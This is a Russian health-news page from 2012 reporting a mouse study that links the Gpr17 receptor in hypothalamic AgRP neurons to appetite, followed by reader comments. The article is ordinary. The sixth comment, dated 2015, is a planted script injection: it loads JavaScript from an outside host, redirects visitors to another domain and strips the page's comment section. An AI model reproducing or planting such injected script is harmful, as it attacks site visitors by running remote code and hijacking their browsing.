Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ура! Наконец-то найден уч...  >>  Ура! Наконец-то найден участок мозга, отвечающий за переедание. Скоро будет новое лекарство
 
Обратная связь
 

Ура! Наконец-то найден участок мозга, отвечающий за переедание. Скоро будет новое лекарство

Размер шрифта
29 июня 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые обнаружили в головном мозге рецептор, играющий ключевую роль в регуляции аппетита. Это открытие позволит создать новые препараты для профилактики и лечения ожирения.

участок мозга, отвечающий за переедание

Цель исследования

При проведении исследования ученые сосредоточили свое внимание на небольшом отделе головного мозга – гипоталамусе. Согласно данным различных авторов, основным звеном регуляции аппетита в нашем организме является особый белок AgRP, который вырабатывается в нейронах гипоталамуса. Однако до настоящего времени факторы, влияющие на выработку этого белка, установить не удавалось. Таким образом, целью исследования явилось изучение факторов, оказывающих влияние на выработку белка AgRP.

Эксперимент на мышах

Американские ученые решили проследить механизм действия двух гормонов – инсулина и лептина, которые принимают участие в регуляции энергии в нашем организме и подавляют активность белка AgRP.

Следует отметить, что блокировка цепочки молекулярных взаимодействий (сигнального пути) одного из гормонов не оказывает существенного влияния на аппетит. Поэтому ученые предположили, что повлиять на аппетит можно только заблокировав оба сигнальных пути.

Для того чтобы проверить эту гипотезу, ученые провели исследование на мышах. Из нейронов гипоталамуса мышей они удалили белок Fox01, который является общим для сигнальных путей инсулина и лептина. Мыши, в нейронах которых белка не было, имели меньший вес и более высокую чувствительность к лептину и инсулину, что является отражением хорошего метаболизма.

Однако на белок Fox01 трудно воздействовать с помощью лекарственных препаратов. Поэтому ученым пришлось искать новую цель воздействия. Им удалось обнаружить ген  Gpr17: он чрезвычайно активен в организме мышей с нормальными нейронами, в которых образуется белок AgRP, но практически не работает при отсутствии белка Fox01. Гену Gpr17 соответствует одноименный рецептор.

В ходе эксперимента было установлено, что если в организм здоровых мышей ввести активатор рецептора Gpr17, то аппетит повышается, а если ввести блокатор Gpr17, то аппетит снижается.

Установлено, что на рецептор Gpr17 можно успешно воздействовать с помощью лекарственных препаратов. Кроме того, рецепторы Gpr17, в основном, сосредоточены в нейронах, вырабатывающих белок AgRP, что позволит избежать побочных эффектов новых препаратов против ожирения.

Результаты

Американским ученым удалось найти рецептор, который играет важную роль в регуляции аппетита. Следует отметить, что на данный рецептор можно воздействовать с помощью лекарственных препаратов. В настоящее время уже существует несколько препаратов, которые воздействуют на него.

Ученые считают, что в ближайшее время  благодаря описанному открытию они смогут создать новые препараты для профилактики и лечения ожирения.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

05 июля 2012 в 21:42

Цитировать   |   Пожаловаться

"Ура! Наконец-то найден участок мозга, отвечающий за переедание."
Отлично! Наконец, прекратятся вечные сюжеты про похудение в ваших передачах!!!

Гость 05 июля 2012 в 21:42
прекратятся вечные сюжеты про похудение в ваших передачах
Достали Вас сюжеты про похудение ...  А не смотреть нашу передачу не пробовали? И сюжетов не видно, и нервничать причин нет.. 

3 - Гость

15 июля 2012 в 23:35

Цитировать   |   Пожаловаться

а что же вы-то, медицинский модератор, отвечаете за авторов?
Пусть они снизойдут до ответов нам, простым смертным!

4 - Гость

23 июля 2012 в 07:10

Комментарий удален за нарушение Правил общения

5 - Гость

01 августа 2012 в 14:24

Комментарий удален за нарушение Правил общения

6 - zzzzzz

30 июня 2015 в 23:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Ожирение делает вас черствым   Ваш крем делает вас толстой   Мифы про мясо. Не питайтесь иллюзиями!   Самые популярные мифы о диабете  
23 июля 2012Обнаружена связь между сном и ожирением! 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
28 июня 2013Хотите похудеть – пейте таблетки от эректильной дисфункции! 14 марта 2013Ваш крем делает вас толстой
 

Слайдшоу

1
Признаки зависимости от еды
Ошибки, которые не дают вам похудеть
Как справиться с обжорством?

Тесты

1
Есть ли у вас избыточный вес?
Жиры, которые мы едим
Готовы ли вы сбросить лишнее?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.